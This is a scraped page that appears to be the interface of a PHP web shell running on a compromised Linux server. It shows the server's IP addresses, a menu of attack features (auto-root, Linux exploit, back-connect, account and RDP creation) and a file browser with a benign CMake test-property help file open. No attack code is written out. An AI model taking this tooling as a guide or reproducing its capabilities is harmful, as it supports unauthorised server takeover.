Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.133.117.5
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
cmake-3.16 /
Help /
prop_test /
[ HOME SHELL ]
Name
Size
Permission
Action
ATTACHED_FILES.rst
206
B
-rw-r--r--
ATTACHED_FILES_ON_FAIL.rst
218
B
-rw-r--r--
COST.rst
621
B
-rw-r--r--
DEPENDS.rst
467
B
-rw-r--r--
DISABLED.rst
712
B
-rw-r--r--
ENVIRONMENT.rst
323
B
-rw-r--r--
FAIL_REGULAR_EXPRESSION.rst
406
B
-rw-r--r--
FIXTURES_CLEANUP.rst
1.83
KB
-rw-r--r--
FIXTURES_REQUIRED.rst
4.8
KB
-rw-r--r--
FIXTURES_SETUP.rst
1.89
KB
-rw-r--r--
LABELS.rst
117
B
-rw-r--r--
MEASUREMENT.rst
286
B
-rw-r--r--
PASS_REGULAR_EXPRESSION.rst
483
B
-rw-r--r--
PROCESSORS.rst
679
B
-rw-r--r--
PROCESSOR_AFFINITY.rst
643
B
-rw-r--r--
REQUIRED_FILES.rst
155
B
-rw-r--r--
RESOURCE_GROUPS.rst
3.45
KB
-rw-r--r--
RESOURCE_LOCK.rst
805
B
-rw-r--r--
RUN_SERIAL.rst
233
B
-rw-r--r--
SKIP_REGULAR_EXPRESSION.rst
490
B
-rw-r--r--
SKIP_RETURN_CODE.rst
442
B
-rw-r--r--
TIMEOUT.rst
318
B
-rw-r--r--
TIMEOUT_AFTER_MATCH.rst
1.39
KB
-rw-r--r--
WILL_FAIL.rst
184
B
-rw-r--r--
WORKING_DIRECTORY.rst
328
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TIMEOUT_AFTER_MATCH.rst
TIMEOUT_AFTER_MATCH ------------------- Change a test's timeout duration after a matching line is encountered in its output. Usage ^^^^^ .. code-block:: cmake add_test(mytest ...) set_property(TEST mytest PROPERTY TIMEOUT_AFTER_MATCH "${seconds}" "${regex}") Description ^^^^^^^^^^^ Allow a test ``seconds`` to complete after ``regex`` is encountered in its output. When the test outputs a line that matches ``regex`` its start time is reset to the current time and its timeout duration is changed to ``seconds``. Prior to this, the timeout duration is determined by the :prop_test:`TIMEOUT` property or the :variable:`CTEST_TEST_TIMEOUT` variable if either of these are set. Because the test's start time is reset, its execution time will not include any time that was spent waiting for the matching output. :prop_test:`TIMEOUT_AFTER_MATCH` is useful for avoiding spurious timeouts when your test must wait for some system resource to become available before it can execute. Set :prop_test:`TIMEOUT` to a longer duration that accounts for resource acquisition and use :prop_test:`TIMEOUT_AFTER_MATCH` to control how long the actual test is allowed to run. If the required resource can be controlled by CTest you should use :prop_test:`RESOURCE_LOCK` instead of :prop_test:`TIMEOUT_AFTER_MATCH`. This property should be used when only the test itself can determine when its required resources are available.
Close